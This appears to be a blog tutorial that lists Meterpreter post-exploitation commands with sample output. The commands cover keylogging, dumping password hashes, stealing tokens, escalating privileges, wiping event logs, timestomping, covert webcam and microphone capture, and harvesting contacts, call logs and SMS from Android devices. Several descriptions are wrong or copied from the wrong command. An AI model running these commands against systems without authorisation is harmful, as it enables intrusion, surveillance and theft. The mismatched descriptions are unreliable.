Since the Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help familiarize you with this most powerful tool.
Throughout this thread, almost every available Meterpreter command is covered. For those that aren’t covered, experimentation is the key to successful learning. And you are free to ask help for it.
list of commands covered:
core commands File System commands Networking Commands User Interface Other Useful commands
------------- -------------------- ------------------- -------------- ---------------------
? cat ifconfig enumdesktops webcam_list
background cd portfwd getdesktop webcam_snap
bgkill del route idletime webcam_stream
bgrun download keyscan_start record_mic
bglist edit System Commands keyscan_dump activity_start
channel getlwd --------------- keyscan_stop check_root
close getwd clearev screenshot geolocate
exit lcd drop_token set_desktop wlan_geolocate
exploit lpwd execute uictl dump_calllog
help ls getpid dump_contacts
interact mkdir getprivs Password hash dump_sms
irb pwd getuid ------------- send_sms
migrate rm kill hashdump
quit rmdir ps
read upload reboot Timestomp commands
run search reg ------------------
resource rev2self timestomp
use shell
write shutdown Privilage Escalation
steal_token --------------------
sys_info getsystem
Note : bookmark this page as it is possibly the most complete cheat sheet of meterpreter commands found anywhere on the web, so you’ll want it to refer back to this sheet often.
Core commands
?
The ? command, as may be expected, displays the Meterpreter help menu.
meterpreter > ? Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session channel Displays information about active channels ...snip...
background
The background command will send the current Meterpreter session to the background and return you to the ‘msf’ prompt. To get back to your Meterpreter session, just interact with it again.
meterpreter > background msf exploit(ms08_067_netapi) > sessions -i 1 [*] Starting interaction with 1...
bgkill
The bgkill command kills a background meterpreter script
bgrun
The bgrun command runs a script as a background thread
bglist
The bglist command provides a list of all running background scripts
channel
The channel command displays all active channels
close
The close command closes a channel
exit
The exit command terminates a meterpreter session
exploit
The exploit command executes the meterpreter script designated after it
help
The help command, as may be expected, displays the Meterpreter help menu as ? command
interact
The interact command starts to interact with a channel interacts with a channel
irb
The irb command switches into Ruby scripting mode
meterpreter > irb [*] Starting IRB shell [*] The 'client' variable holds the meterpreter client >>
migrate
Using the migrate post module, you can migrate to another process on the victim.
meterpreter > run post/windows/manage/migrate [*] Running module against V-MAC-XP [*] Current server process: svchost.exe (1076) [*] Migrating to explorer.exe... [*] Migrating into process ID 816 [*] New server process: Explorer.EXE (816)
quit
The quit command terminates the meterpreter session
read
The read command helps to reads the data from a channel
run
The run executes the meterpreter script designated after it
resource
The resource command will execute Meterpreter instructions load inside a text file. Containing one entry per line, resource will execute each line in sequence. This can help automate repetitive actions performed by a user. By default, the commands will run in the current working directory (on target machine) and resource file in the local working directory (the attacking machine).
meterpreter > resource Usage: resource path1 path2Run the commands stored in the supplied files.
use
The use command loads a meterpreter extension
write
The command command writes data to a channel
File system commands
cat
The cat command is identical to the command found on *nix systems. It displays the content of a file when it’s given as an argument.
meterpreter > cat edit.txt What you talkin' about Willis
cd
The change directory “cd” works the same way as it does under DOS and *nix systems.
meterpreter > cd c:\windows meterpreter > pwd c:\windows
del
The del command delete a file on the victim
download
The download command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path. The -r option allows you to do so recursively.
meterpreter > download c:\\boot.ini [*] downloading: c:\boot.ini -> c:\boot.ini [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
edit
The edit command opens a file located on the target host. It uses the ‘vim’ so all the editor’s commands are available.
meterpreter > edit edit.txt
getlwd
The getlwd command prints the local working directory
lcd
The lcd command changes working local directory. Changing the working directory will give your Meterpreter session access to files located in this folder.
meterpreter > lcd /var/www meterpreter > lpwd /var/www
lpwd
The lpwd display working local directory. When receiving a Meterpreter shell, the local working directory is the location where one started the Metasploit console.
meterpreter > lpwd /root
ls
As in Linux, the ls command will list the files in the current remote directory.
meterpreter > ls Listing: C:\Documents and Settings\victim ========================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2009 . 40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2009 .. 100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2009 .recently-used.xbel 40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2009 Application Data ...snip...
mkdir
The mkdir command makes a directory in victim’s system
pwd
The pwd command displays current working directly on the target host. By default, the current working folder is where the connection to your listener was initiated.
rm
The rm command as in *nix systems delete (remove) a file
rmdir
The rmdir command as in *nix systems delete (remove) a directory
upload
As with the download command, you need to use double-slashes with the upload command. It uploads a file into target system. The -r option allows you to do so recursively.
search
The search commands provides a way of locating specific files on the target host. The command is capable of searching through the whole system or specific folders. Wildcards can also be used when creating the file pattern to search for.
meterpreter > search -f sea*.bat c:\\xamp\\ Found 1 result... c:\\xampp\perl\bin\search.bat (57035 bytes)
Networking Commands
ifconfig, ipconfig
The ifconfig or ipconfig command displays the network interfaces and addresses on the remote machine.
meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport Hardware MAC: 00:0c:29:10:f5:15 IP Address : 192.168.1.104 Netmask : 255.255.0.0
portfwd
The portfwd command forwards a port on the victim system to a remote service
route
The route command helps to view or modify the victim routing table
System Commands
clearev
The clearev command will clear the Application, System, and Security logs on a Windows system. There are no options or arguments.
meterpreter > clearev [*] Wiping 97 records from Application... [*] Wiping 415 records from System... [*] Wiping 0 records from Security...
drop_token
The drop_token command drops a stolen token
execute
The execute command runs a command on the target.
meterpreter > execute -f cmd.exe -i -H Process 38320 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
getpid
The getpid command gets the current process ID (PID)
getprivs
The getprivs command gets as many privileges as possible
meterpreter > getprivs ============================================================ Enabled Process Privileges ============================================================ SeDebugPrivilege SeTcbPrivilege SeAssignPrimaryTokenPrivilege ....
getuid
The getuid command get the user that the server is running as host
kill
Thekill command get the user that the server is running as host
ps
The ps command displays a list of running processes on the target.
meterpreter > ps Process list ============ PID Name Path --- ---- ---- 132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 288 snmp.exe C:\WINDOWS\System32\snmp.exe ...snip...
reboot
The reboot command reboots the victim computer
reg
The reg command interact with the victim’s registry
rev2self
The rev2self command calls RevertToSelf() on the victim machine
shell
The shell command will present you with a standard shell on the target system.
meterpreter > shell Process 39640 created. Channel 2 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
shutdown
The shutdown command shuts down the victim’s computer
steal_token
The steal_token command attempts to steal the token of a specified (PID) process
sys_info
The sys_info command gets the details about the victim computer such as OS and name
UserInterface Commands
enumdesktops
The enumdesktops command lists all accessible desktops
meterpreter > enumdesktops Enumerating all accessible desktops Desktops ======== Session Station Name ------- ------- ---- 0 WinSta0 Default 0 WinSta0 Disconnect 0 WinSta0 Winlogon 0 SAWinSta SADesktop
getdesktop
The getdesktop command gets the current meterpreter desktop
idletime
The idletime command checks to see how long since the victim system has been idle or inactive.
meterpreter > idletime User has been idle for: 5 hours 26 mins 35 secs
keyscan_start
The keyscan_start command starts the software keylogger when associated with a process such as Word or browser
meterpreter > keyscan_start Starting the keystroke sniffer...
keyscan_dump
The keyscan_dump command starts the software keylogger when associated with a process such as Word or browser
meterpreter > keyscan_dump Dumping captured keystrokes... tgoogle.cm my credit amex myusernamthi amexpasswordpassword
keyscan_stop
The keyscan_stop command stops the software keylogger
screenshot
The screenshot command grabs a screenshot of the meterpreter desktop
set_desktop
The set_desktop command changes the meterpreter desktop
uictl
The uictl command enables control of some of the user interface components
Privilege Escalation Commands
getsystem
The getsystem command uses 15 built-in methods to gain sysadmin privileges
Password hash Commands
hashdump
The hashdump post module will dump the contents of the SAM database.
meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3::: dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9::: victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
Timestomp commands
timestomp
The timestomp command manipulates the modify, access, and create attributes of a file
meterpreter > timestomp -h Usage: timestomp OPTIONS file_path OPTIONS: -a Set the "last accessed" time of the file -b Set the MACE timestamps so that EnCase shows blanks -c Set the "creation" time of the file -e Set the "mft entry modified" time of the file -f Set the MACE of attributes equal to the supplied file -h Help banner -m Set the "last written" time of the file -r Set the MACE timestamps recursively on a directory -v Display the UTC MACE values of the file -z Set all four attributes (MACE) of the file
Some other usefull commads
webcam_list
The webcam_list command lists all available wecams in target machine
meterpreter > webcam_list 1: Creative WebCam NX Pro 2: Creative WebCam NX Pro (VFW)
webcam_snap
The webcam_snap takes picture through webcam
meterpreter > webcam_snap -h Usage: webcam_snap [options] Grab a frame from the specified webcam. OPTIONS: -h Help Banner -i The index of the webcam to use (Default: 1) -p The JPEG image path (Default: 'gnFjTnzi.jpeg') -q The JPEG image quality (Default: '50') -v Automatically view the JPEG image (Default: 'true')
webcam_stream
The webcam_stream get live streaming of target
meterpreter > webcam_snap -h Usage: webcam_snap [options] Grab a frame from the specified webcam. OPTIONS: -h Help Banner -i The index of the webcam to use (Default: 1) -p The JPEG image path (Default: 'gnFjTnzi.jpeg') -q The JPEG image quality (Default: '50') -v Automatically view the JPEG image (Default: 'true')
record_mic
The record_mic gets recoreded soundtrack of target
meterpreter > record_mic -d 20 [*] Starting... [*] Stopped Audio saved to: /Users/user/rapid7/msf/YAUtubCR.wav
activity_start
The activity_start is an execute command by starting an Android activity from a URI string.
check_root
The check_root checks the target is whether rooted or not
meterpreter > check_root [*] Device is not rooted
geolocate
The geolocate allows you to locate the phone by retrieving the current lat-long using geolocation.
wlan_geolocate
The wlan_geolocate allows you to locate the phone by retrieving the current lat-long using WLAN information.
meterpreter > wlan_geolocate [*] Google indicates the device is within 150 meters of 30.*******,-97.*******. [*] Google Maps URL: https://maps.google.com/?q=30.*******,-97.*******
dump_calllog
The dump_calllog retrieves the call log from the Android device.
meterpreter > dump_calllog [*] Fetching 500 entries [*] Contacts list saved to: calllog_dump_20160374745744.txt
dump_contacts
The dump_contacts retrieves contacts from target
meterpreter > dump_contacts [*] Fetching 5 contacts into list [*] Contacts list saved to: contacts_dump_20160308155744.txt
dump_smd, sms_dump
The dump_sms or sms_dump retrieves the sms information from the Android device.
meterpreter > dump_contacts [*] Fetching 5 contacts into list [*] Contacts list saved to: contacts_dump_20160308155744.txt
send_sms
The send allows to send sms from target machine
meterpreter > send_sms -d 9678****** -t hacked [*] SMS send - Transmission succesfull
Stay Tuned for More Meterpreter Tips…😃
Related posts
Feedback !
Sorry if this tutorial seemed a bit mundane, but the information contained is still valuable! Don’t forget to voice your comments, questions, or concerns, I’m positive that they’ll all be addressed in some form.
Thanks for reading 😃